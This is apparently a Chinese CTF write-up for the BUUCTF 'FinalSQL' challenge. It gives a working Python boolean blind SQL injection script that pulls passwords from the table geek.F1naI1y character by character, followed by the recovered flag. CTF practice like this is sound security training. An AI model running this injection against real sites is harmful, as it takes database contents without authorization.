[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
清平乐的技术专栏3 分钟前
Hive SQL中COALESCE 函数和NVL()函数、IFNULL函数区别
hive·hadoop·sql
Hello.Reader4 分钟前
Flink SQL 的 TRUNCATE 用法详解(Batch 模式)
sql·flink·batch
doupoa11 分钟前
Vue3+Monaco Editor封装及SQL编辑器实现
数据库·sql·编辑器
if时光重来1 小时前
kingbase数据库指定数据表自增id重置
数据库·python·sql
jingyucsdn1 小时前
将postgresql结构和数据备份成sql语句
数据库·sql·postgresql
梦里不知身是客111 小时前
explain分析SQL语句分析sql语句的优劣
java·数据库·sql
榮十一2 小时前
100道Java面试SQL题及答案
java·sql·面试
AI分享猿2 小时前
新手跨境电商实测:Apache 搭站,雷池 WAF 零基础部署
安全·web安全·react.js·网络安全·开源·apache
Yeniden2 小时前
Deepeek用大白话讲解 → 解释器模式(企业级场景1,规则引擎2,表达式解析3,SQL解析4)
java·sql·解释器模式
饕餮争锋11 小时前
SQL条件中WHERE 1=1 的功能
数据库·sql